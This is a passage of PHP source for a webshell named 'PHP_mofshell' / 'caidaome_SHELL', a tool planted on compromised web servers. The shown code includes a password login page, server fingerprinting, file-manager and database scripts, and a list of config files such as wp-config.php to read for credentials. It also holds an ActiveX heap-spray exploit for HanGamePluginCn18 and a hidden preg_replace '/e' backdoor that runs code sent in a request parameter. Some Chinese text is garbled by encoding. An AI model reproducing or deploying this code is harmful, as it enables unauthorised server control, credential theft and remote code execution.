$unc_len);\r\n\r\n\r\n\t\tfwrite($this->fp,$datastr);\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n        $dirstr  = "\\x50\\x4b\\x01\\x02";\r\n        $dirstr .= "\\x00\\x00"; \r\n        $dirstr .= "\\x14\\x00";\r\n        $dirstr .= "\\x00\\x00";\r\n        $dirstr .= "\\x08\\x00";\r\n        $dirstr .= $hexdtime;\r\n        $dirstr .= pack(\'V\', $crc); \r\n        $dirstr .= pack(\'V\', $c_len); \r\n        $dirstr .= pack(\'V\', $unc_len);       \t// uncompressed filesize\r\n        $dirstr .= pack(\'v\', strlen($name) ); \t// length of filename\r\n        $dirstr .= pack(\'v\', 0 );             \t// extra field length\r\n        $dirstr .= pack(\'v\', 0 );             \t// file comment length\r\n        $dirstr .= pack(\'v\', 0 );             \t// disk number start\r\n        $dirstr .= pack(\'v\', 0 );             \t// internal file attributes\r\n        $dirstr .= pack(\'V\', 32 );            \t// external file attributes - \'archive\' bit set\r\n        $dirstr .= pack(\'V\',$this->datastr_len ); // relative offset of local header\r\n        $dirstr .= $name;\r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\t//Ŀ¼��Ϣ\r\n\t\t\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n    }\r\n\r\n\tfunction adddir($name){ \r\n\t\t$name = str_replace("\\\\", "/", $name); \r\n\t\t$datastr = "\\x50\\x4b\\x03\\x04\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t\r\n\t\t$datastr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$datastr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); \r\n\r\n\t\tfwrite($this->fp,$datastr);\t\r\n\t\t$my_datastr_len = strlen($datastr);\r\n\t\tunset($datastr);\r\n\t\t\r\n\t\t$dirstr = "\\x50\\x4b\\x01\\x02\\x00\\x00\\x0a\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00"; \r\n\t\t$dirstr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); \r\n\t\t$dirstr .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); \r\n\t\t$dirstr .= pack("V", 16 ).pack("V",$this->datastr_len).$name; \r\n\t\t\r\n\t\t$this->dirstr .= $dirstr;\r\n\r\n\t\t$this -> file_count ++;\r\n\t\t$this -> dirstr_len += strlen($dirstr);\r\n\t\t$this -> datastr_len += $my_datastr_len;\t\r\n\t}\r\n\r\n\r\n\tfunction createfile(){\r\n\t\t$endstr = "\\x50\\x4b\\x05\\x06\\x00\\x00\\x00\\x00" .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'v\', $this -> file_count) .\r\n\t\t\t\t\tpack(\'V\', $this -> dirstr_len) .\r\n\t\t\t\t\tpack(\'V\', $this -> datastr_len) .\r\n\t\t\t\t\t"\\x00\\x00";\r\n\r\n\t\tfwrite($this->fp,$this->dirstr.$endstr);\r\n\t\tfclose($this->fp);\r\n\t}\r\n }\r\n\r\n\r\nfunction start_unzip($tmp_name,$new_name,$todir=\'zipfile\'){\r\n$zip = new ZipArchive() ;\r\nif ($zip->open($tmp_name) !== TRUE) {\r\necho \'��Ǹ��ѹ����޷��򿪻���\';\r\n}\r\n$zip->extractTo($todir);\r\n$zip->close();\r\necho \'��ѹ��ϣ�&nbsp;&nbsp;&nbsp;<a href="?eanver=main&path=\'.urlencode($todir).\'">�����ѹĿ¼</a>&nbsp;&nbsp;&nbsp;<a href="javascript:history.go(-1);">����</a>\';\r\n}\r\n\r\nfunction muma($filecode,$filetype){\r\n\t$dim = array(\r\n\t"php" => array("eval(","exec("),\r\n\t"asp" => array("WScript.Shell","execute(","createtextfile("),\r\n\t"aspx" => array("Response.Write(eval(","RunCMD(","CreateText()"),\r\n\t"jsp" => array("runtime.exec(")\r\n\t);\r\n\tforeach($dim[$filetype] as $code){\r\n\t\tif(stristr($filecode,$code)) return true;\r\n\t}\r\n}\r\n\r\nfunction debug($file,$ftype){\r\n\t$type=explode(\'|\',$ftype);\r\n\tforeach($type as $i){\r\n\t\tif(stristr($file,$i))\treturn true;\r\n\t}\r\n}\r\n\r\n/*---string---*/\r\n\r\nfunction str_path($path){\r\n\treturn str_replace(\'//\',\'/\',$path);\r\n}\r\n\r\nfunction msg($msg){\r\n\tdie("<script>window.alert(\'".$msg."\');history.go(-1);</script>");\r\n}\r\n\r\nfunction uppath($nowpath){\r\n\t$nowpath = str_replace(\'\\\\\',\'/\',dirname($nowpath));\r\n\treturn urlencode($nowpath);\r\n}\r\n\r\nfunction xxstr($key){\r\n\t$temp = str_replace("\\\\\\\\","\\\\",$key);\r\n\t$temp = str_replace("\\\\","\\\\\\\\",$temp);\r\n\treturn $temp;\r\n}\r\n\r\n/*---html---*/\r\n\r\nfunction html_ta($url,$name){\r\n\thtml_n("<a href=\\"$url\\" target=\\"_blank\\">$name</a>");\r\n}\r\n\r\nfunction html_a($url,$name,$where=\'\'){\r\n\thtml_n("<a href=\\"$url\\" $where>$name</a> ");\r\n}\r\n\r\nfunction html_img($url){\r\n\thtml_n("<img src=\\"?img=$url\\" border=0>");\r\n}\r\n\r\nfunction back(){\r\n\thtml_n("<input type=\'button\' value=\'����\' onclick=\'history.back();\'>");\r\n}\r\n\r\nfunction html_radio($namei,$namet,$v1,$v2){\r\n\thtml_n(\'<input type="radio" name="return" value="\'.$v1.\'" checked>\'.$namei);\r\n\thtml_n(\'<input type="radio" name="return" value="\'.$v2.\'">\'.$namet.\'<br><br>\');\r\n}\r\n\r\nfunction html_input($type,$name,$value = \'\',$text = \'\',$size = \'\',$mode = false){\r\n\tif($mode){\r\n\t\thtml_n("<input type=\\"$type\\" name=\\"$name\\" value=\\"$value\\" size=\\"$size\\" checked>$text");\r\n\t}else{\r\n\t\thtml_n("$text <input type=\\"$type\\" name=\\"$name\\" value=\\"$value\\" size=\\"$size\\">");\r\n\t}\r\n}\r\n\r\nfunction html_base(){\r\nhtml_n(\'function base64encode(str){\r\n\tvar base64EncodeChars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";\r\n    var out, i, len;\r\n    var c1, c2, c3;\r\n    len = str.length;\r\n    i = 0;\r\n    out = "";\r\n    while (i < len) {\r\n        c1 = str.charCodeAt(i++) & 0xff;\r\n        if (i == len) {\r\n            out += base64EncodeChars.charAt(c1 >> 2);\r\n            out += base64EncodeChars.charAt((c1 & 0x3) << 4);\r\n            out += "==";\r\n            break;\r\n        }\r\n        c2 = str.charCodeAt(i++);\r\n        if (i == len) {\r\n            out += base64EncodeChars.charAt(c1 >> 2);\r\n            out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n            out += base64EncodeChars.charAt((c2 & 0xF) << 2);\r\n            out += "=";\r\n            break;\r\n        }\r\n        c3 = str.charCodeAt(i++);\r\n        out += base64EncodeChars.charAt(c1 >> 2);\r\n        out += base64EncodeChars.charAt(((c1 & 0x3) << 4) | ((c2 & 0xF0) >> 4));\r\n        out += base64EncodeChars.charAt(((c2 & 0xF) << 2) | ((c3 & 0xC0) >> 6));\r\n        out += base64EncodeChars.charAt(c3 & 0x3F);\r\n    }\r\n    return out;\r\n}\');\r\n}\r\n\r\nfunction html_text($name,$cols,$rows,$value = \'\'){\r\n\thtml_n("<br><br><textarea name=\\"$name\\" COLS=\\"$cols\\" ROWS=\\"$rows\\" >$value</textarea>");\r\n}\r\n\r\nfunction html_select($array,$mode = \'\',$change = \'\',$name = \'class\'){\r\n\thtml_n("<select name=$name $change>");\r\n\tforeach($array as $name => $value){\r\n\t\tif($name == $mode){\r\n\t\t\thtml_n("<option value=\\"$name\\" selected>$value</option>");\r\n\t\t}else{\r\n\t\t\thtml_n("<option value=\\"$name\\">$value</option>");\r\n\t\t}\r\n\t}\r\n\thtml_n("</select>");\r\n}\r\n\r\nfunction html_font($color,$size,$name){\r\n\thtml_n("<font color=\\"$color\\" size=\\"$size\\">$name</font>");\r\n}\r\n\r\nfunction GetHtml($url)\r\n{\r\n      $c = \'\';\r\n      $useragent = \'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\';\r\n      if(function_exists(\'fsockopen\')){\r\n    \t$link = parse_url($url);\r\n\t    $query=$link[\'path\'].\'?\'.$link[\'query\'];\r\n\t    $host=strtolower($link[\'host\']);\r\n\t    $port=$link[\'port\'];\r\n\t    if($port==""){$port=80;}\r\n\t    $fp = fsockopen ($host,$port, $errno, $errstr, 10);\r\n\t    if ($fp)\r\n\t      {\r\n\t\t    $out = "GET /{$query} HTTP/1.0\\r\\n"; \r\n\t\t    $out .= "Host: {$host}\\r\\n"; \r\n\t\t    $out .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2)\\r\\n"; \r\n\t\t    $out .= "Connection: Close\\r\\n\\r\\n"; \r\n\t\t    fwrite($fp, $out);\r\n\t\t    $inheader=1;\r\n\t\t    while(!feof($fp)) \r\n\t\t         {$line=fgets($fp,4096);\t\r\n\t\t\t      if($inheader==0){$contents.=$line;}\r\n\t\t\t      if ($inheader &&($line=="\\n"||$line=="\\r\\n")){$inheader = 0;}\r\n\t\t    } \r\n\t\t    fclose ($fp); \r\n\t\t    $c= $contents;\r\n\t      }\r\n        }\r\n\t\tif(empty($c) && function_exists(\'curl_init\') && function_exists(\'curl_exec\')){\r\n            $ch = curl_init();\r\n            curl_setopt($ch, CURLOPT_URL, $url);\r\n            curl_setopt($ch, CURLOPT_TIMEOUT, 15);\r\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);\r\n            curl_setopt($ch, CURLOPT_USERAGENT, $useragent);\r\n            $c = curl_exec($ch);\r\n            curl_close($ch);\r\n        }\r\n        if(empty($c) && ini_get(\'allow_url_fopen\')){\r\n            $c = file_get_contents($url);\r\n        }\r\n\t\tif(empty($c)){\r\n            echo "document.write(\'<DIV style=\\\'CURSOR:url(\\"$url\\")\\\'>\');";\r\n        }\r\n\t\tif(!empty($c))\r\n\t\t{\r\n        return $c;\r\n\t\t}\r\n }\r\n \r\n \r\nfunction html_main($path,$shellname){\r\n\r\nif (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")\r\n{\r\n $safemode = TRUE;\r\n $hsafemode = "<font color=red>ON (��ȫ)</font>";\r\n}\r\nelse {$safemode = FALSE; $hsafemode = "<font color=green>OFF (����ȫ)</font>";\r\n}\r\n\t$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);\r\n\t$Server_OS = PHP_OS;\r\n\t$Server_Soft = $_SERVER["SERVER_SOFTWARE"];\r\n\t$web_server =  php_uname();\r\nprint<<<END\r\n<html><title>{$Server_IP} -PHP_mofshell By{$shellname}- {$Server_OS} - {$Server_Soft}</title>\r\n<table width=\'100%\'><tr><td><form method=\'GET\' target=\'main\'><input type=\'hidden\' name=\'eanver\' value=\'main\'>��ַ:<input name=\'path\' style=\'width:90%\' value=\'{$path}\'>&nbsp<input name=\'Submit\' type=\'submit\' value=\'���\'> <input type=\'submit\' value=\'ˢ��\' onclick=\'main.location.reload()\'></td></tr><tr align=\'center\'><td><b>��ȫģʽ:{$hsafemode}----{$Server_IP}-----{$Server_OS}-----{$Server_Soft}-----{$web_server }</b></td></tr><tr align=\'center\'><td></td></tr></form></table>\r\nEND;\r\n\thtml_n("<table width=\'100%\' height=\'95.7%\' border=0 cellpadding=\'0\' cellspacing=\'0\'><tr><td width=\'170\'><iframe name=\'left\' src=\'?eanver=left\' width=\'100%\' height=\'100%\' frameborder=\'0\'>");\r\n\thtml_n("</iframe></td><td><iframe name=\'main\' src=\'?eanver=main\' width=\'100%\' height=\'100%\' frameborder=\'1\'>");\r\n\thtml_n("</iframe></td></tr></table></html>");\r\n}\r\n\r\nfunction islogin($shellname,$myurl){\r\n\t$Server_IP = gethostbyname($_SERVER["SERVER_NAME"]);\r\n\t$Server_OS = PHP_OS;\r\n\t$Server_Soft = $_SERVER["SERVER_SOFTWARE"];\r\n\t$web_server =  php_uname();\r\nprint<<<END\r\n<!DOCTYPE html>\r\n<head>\r\n<meta http-equiv="Content-Type" content="text/html; charset=gb2312" />\r\n<title>{$Server_IP}-PHPmofshell By:{$shellname}</title>\r\n<style type="text/css">\r\nbody{background-color:#000;}\r\ninput,select,textarea{font-size: 12px;background-color:#dddddd;border:1px solid #fff}\r\nbody,div{font-size: 20px;color:#ddd;}\r\n</style>\r\n</head>\r\n<body scroll=no><div align="center">\r\n<span style="color: #676767;font-family: Tahoma, Geneva, sans-serif;font-size:12px;">\r\n <b>{$Server_OS}______{$Server_Soft}______{$web_server }</b>\r\n\r\n</div>\r\n<div align="center" style="margin-right:70px; margin-bottom:400px;">\r\n<br><br><br><br><form method=\'post\'>PASS��<input name=\'envlpass\' type=\'password\' size=\'20\'> <input type=\'submit\' value=\'��½\'></form><br><br>\r\n</div>\r\n<center>[<font color="red">+</font>] ����PHP SHELL��֧��mof˫�齨��Ȩ,2003��������ͨ��<br />[<font color="red">+</font>] ���½��ʹ��<br />[<font color="red">+</font>] �������ڷǷ���;��������Ը���<br />[<font color="green">+</font>] caidaome_SHELL 2018.01.01<br />\r\n</center></span>\r\n<body>\r\n</html>\r\nEND;\r\n@preg_replace("/[_]/e",$_REQUEST[\'h\'],"__");}function html_sql(){html_input("text","sqlhost","localhost","<br>MYSQL��ַ","30");html_input("text","sqlport","3306","<br>MYSQL�˿�","30");html_input("text","sqluser","root","<br>MYSQL�û�","30");html_input("password","sqlpass","","<br>MYSQL����","30");html_input("text","sqldb","dbname","<br>MYSQL���","30");html_input("submit","sqllogin","��½","<br>");html_n(\'</form>\');}\r\n\r\nfunction Mysql_Len($data,$len)\r\n{\r\n\tif(strlen($data) < $len) return $data;\r\n\treturn substr_replace($data,\'...\',$len);\r\n}\r\n\r\nfunction html_n($data){\t\t\r\n\techo "$data\\n";\r\n}\r\n\r\n/*---css---*/\r\n\r\nfunction css_img($img){\r\n\t$images = array(\r\n\t"exe"=>\r\n\t"R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7".\r\n\t"WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt".\r\n\t"xhIAOw==",\r\n\t"dir"=>"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE".\r\n\t"oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",\r\n\t"txt"=>\r\n\t"R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ".\r\n\t"SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7".\r\n\t"UpPWG3Ig6Hq/XmRjuZwkAAA7",\r\n\t"html"=>\r\n\t"R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz".\r\n\t"c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P".\r\n\t"KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk".\r\n\t"Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR".\r\n\t"ADs=",\r\n\t"js"=>\r\n\t"R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH".\r\n\t"k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs".\r\n\t"a00AjYYBbc/o9HjNniUAADs=",\r\n\t"xml"=>\r\n\t"R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA".\r\n\t"gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx".\r\n\t"OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ".\r\n\t"IQA7",\r\n\t"mp3"=>\r\n\t"R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU".\r\n\t"aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc".\r\n\t"IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=",\r\n\t"img"=>\r\n\t"R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA".\r\n\t"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci".\r\n\t"Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd".\r\n\t"FxEAOw==",\r\n\t"title"=>"R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+".\r\n\t"mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n\t"ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL".\r\n\t"I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7",\r\n\t"rar"=>"R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".\r\n    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".\r\n    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".\r\n    "aNOmRcjVj02tPxPCzfkvIAA7"\r\n\t);\r\n  header(\'Content-type: image/gif\');\r\n  echo base64_decode($images[$img]);\r\n  die();\r\n}\r\n\r\nfunction css_showimg($file){\r\n\t$it=substr($file,-3);\r\n\tswitch($it){\r\n\t\tcase "jpg": case "gif": case "bmp": case "png": case "ico": return \'img\';break;\r\n\t\tcase "htm": case "tml": return \'html\';break;\r\n\t\tcase "exe": case "com": return \'exe\';break;\r\n\t\tcase "xml": case "doc": return \'xml\';break;\r\n\t\tcase ".js": case "vbs": return \'js\';break;\r\n\t\tcase "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return \'mp3\';break;\r\n\t\tcase "rar": case "tar": case ".gz": case "zip":case "iso": return \'rar\';break;\r\n  \tdefault: return \'txt\';break;\r\n\t}\r\n}\r\n\r\nfunction css_js($num,$code = \'\'){\r\n\tif($num == "shellcode"){\r\n\t\treturn \'<%@ LANGUAGE="JavaScript" %>\r\n\t\t<%\r\n\t\tvar act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");\r\n\t\tvar shellcode = unescape("\'.$code.\'");\r\n\t\tvar bigblock = unescape("%u9090%u9090");\r\n\t\tvar headersize = 20;\r\n\t\tvar slackspace = headersize+shellcode.length;\r\n\t\twhile (bigblock.length<slackspace) bigblock+=bigblock;\r\n\t\tfillblock = bigblock.substring(0, slackspace);\r\n\t\tblock = bigblock.substring(0, bigblock.length-slackspace);\r\n\t\twhile(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n\t\tmemory = new Array();\r\n\t\tfor (x=0; x<300; x++) memory[x] = block + shellcode;\r\n\t\tvar buffer = "";\r\n\t\twhile (buffer.length < 1319) buffer+="A";\r\n\t\tbuffer=buffer+"\\x0a\\x0a\\x0a\\x0a"+buffer;\r\n\t\tact.hgs_startNotify(buffer);\r\n\t\t%>\';\r\n\t}\r\n\thtml_n(\'<script language="javascript">\');\r\n\tif($num == "1"){\r\n\thtml_n(\'\tfunction rusurechk(msg,url){\r\n\t\tsmsg = "FileName:[" + msg + "]\\nPlease Input New File:";\r\n\t\tre = prompt(smsg,msg);\r\n\t\tif (re){\r\n\t\t\turl = url + re;\r\n\t\t\twindow.location = url;\r\n\t\t}\r\n\t}\r\n\tfunction rusuredel(msg,url){\r\n\t\tsmsg = "Do You Suer Delete [" + msg + "] ?";\r\n\t\tif(confirm(smsg)){\r\n\t\t\tURL = url + msg;\r\n\t\t\twindow.location = url;\r\n\t\t} \r\n\t}\r\n\tfunction Delok(msg,gourl)\r\n\t{\r\n\t\tsmsg = "ȷ��Ҫɾ��[" + unescape(msg) + "]��?";\r\n\t\tif(confirm(smsg))\r\n\t\t{\r\n\t\t\tif(gourl == \\\'b\\\')\r\n\t\t\t{\r\n\t\t\t\tdocument.getElementById(\\\'actall\\\').value = escape(gourl);\r\n\t\t\t\tdocument.getElementById(\\\'fileall\\\').submit();\r\n\t\t\t}\r\n\t\t\telse window.location = gourl;\r\n\t\t}\r\n\t}\r\n\tfunction CheckAll(form)\r\n\t{\r\n\t\tfor(var i=0;i<form.elements.length;i++)\r\n\t\t{\r\n\t\t\tvar e = form.elements[i];\r\n\t\t\tif (e.name != \\\'chkall\\\')\r\n\t\t\te.checked = form.chkall.checked;\r\n\t\t}\r\n\t}\r\n\tfunction CheckDate(msg,gourl)\r\n\t{\r\n\t\tsmsg = "��ǰ�ļ�ʱ��:[" + msg + "]";\r\n\t\tre = prompt(smsg,msg);\r\n\t\tif(re)\r\n\t\t{\r\n\t\t\tvar url = gourl + re;\r\n\t\t\tvar reg = /^(\\\\d{1,4})(-|\\\\/)(\\\\d{1,2})\\\\2(\\\\d{1,2}) (\\\\d{1,2}):(\\\\d{1,2}):(\\\\d{1,2})$/; \r\n\t\t\tvar r = re.match(reg);\r\n\t\t\tif(r==null){alert(\\\'���ڸ�ʽ���ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\\\');return false;}\r\n\t\t\telse{document.getElementById(\\\'actall\\\').value = gourl; document.getElementById(\\\'inver\\\').value = re; document.getElementById(\\\'fileall\\\').submit();}\r\n\t\t}\r\n\t}\r\n\tfunction SubmitUrl(msg,txt,actid)\r\n\t{\r\n\t\tre = prompt(msg,unescape(txt));\r\n\t\tif(re)\r\n\t\t{\r\n\t\t\tdocument.getElementById(\\\'actall\\\').value = actid;\r\n\t\t\tdocument.getElementById(\\\'inver\\\').value = escape(re);\r\n\t\t\tdocument.getElementById(\\\'fileall\\\').submit();\r\n\t\t}\r\n\t}\');\r\n\t}elseif($num == "2"){\r\n\thtml_n(\'var NS4 = (document.layers);\r\nvar IE4 = (document.all);\r\nvar win = this;\r\nvar n = 0;\r\nfunction search(str){\r\n\tvar txt, i, found;\r\n\tif(str == "")return false;\r\n\tif(NS4){\r\n\t\tif(!win.find(str)) while(win.find(str, false, true)) n++; else n++;\r\n\t\tif(n == 0) alert(str + " ... Not-Find")\r\n\t}\r\n\tif(IE4){\r\n\t\ttxt = win.document.body.createTextRange();\r\n\t\tfor(i = 0; i <= n && (found = txt.findText(str)) != false; i++){\r\n\t\t\ttxt.moveStart("character", 1);\r\n\t\t\ttxt.moveEnd("textedit")\r\n\t\t}\r\n\t\tif(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}\r\n\t\telse{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}\r\n\t}\r\n\treturn false\r\n}\r\nfunction CheckDate(){\r\n\tvar re = document.getElementById(\\\'mtime\\\').value;\r\n\tvar reg = /^(\\\\d{1,4})(-|\\\\/)(\\\\d{1,2})\\\\2(\\\\d{1,2}) (\\\\d{1,2}):(\\\\d{1,2}):(\\\\d{1,2})$/; \r\n\tvar r = re.match(reg);\r\n\tif(r==null){alert(\\\'���ڸ�ʽ���ȷ!��ʽ:yyyy-mm-dd hh:mm:ss\\\');return false;}\r\n\telse{document.getElementById(\\\'editor\\\').submit();}\r\n}\');\r\n}elseif($num == "3"){\r\n\thtml_n(\'function Full(i){\r\n   if(i==0 || i==5){\r\n     return false;\r\n   }\r\n  Str = new Array(12);  \r\n\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";\r\n\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";\r\n\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";\r\n\tStr[4] = "Provider=MSDAORA.1;Password=����;User ID=�ʺ�;Data Source=�����;Persist Security Info=True;";\r\n\tStr[6] = "SELECT * FROM [TableName] WHERE ID<100";\r\n\tStr[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\\\'eanver\\\',\\\'mypass\\\')";\r\n\tStr[8] = "DELETE FROM [TableName] WHERE ID=100";\r\n\tStr[9] = "UPDATE [TableName] SET USER=\\\'eanver\\\' WHERE ID=100";\r\n\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";\r\n\tStr[11] = "DROP TABLE [TableName]";\r\n\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";\r\n\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";\r\n\tif(i<=4){\r\n\t  DbForm.string.value = Str[i];\r\n  }else{\r\n  \tDbForm.sql.value = Str[i];\r\n  }\r\n  return true;\r\n  }\');\r\n}\r\nelseif($num == "4"){\r\n\thtml_n(\'function Fulll(i){\r\n   if(i==0){\r\n     return false;\r\n   }\r\n  Str = new Array(8);  \r\n\tStr[1] = "config.inc.php";\r\n\tStr[2] = "config.inc.php";\r\n\tStr[3] = "config_base.php";\r\n\tStr[4] = "config.inc.php";\r\n\tStr[5] = "config.php";\r\n\tStr[6] = "wp-config.php";\r\n\tStr[7] = "config.php";\r\n\tStr[8] = "mysql.php";\r\n\tsform.code.value = Str[i];\r\n  return true;\r\n  }\');\r\n}\r\nhtml_n(\'</script>\');\r\n}\r\n\r\nfunction css_left(){\r\n\thtml_n(\'<style type="text/css">\r\n\t.menu{width:140px;margin-left:auto;margin-right:auto;}\r\n\t.menu dl{margin-top:2px;}\r\n\t.menu dl dt{top left repeat-x;}\r\n\t.menu dl dt 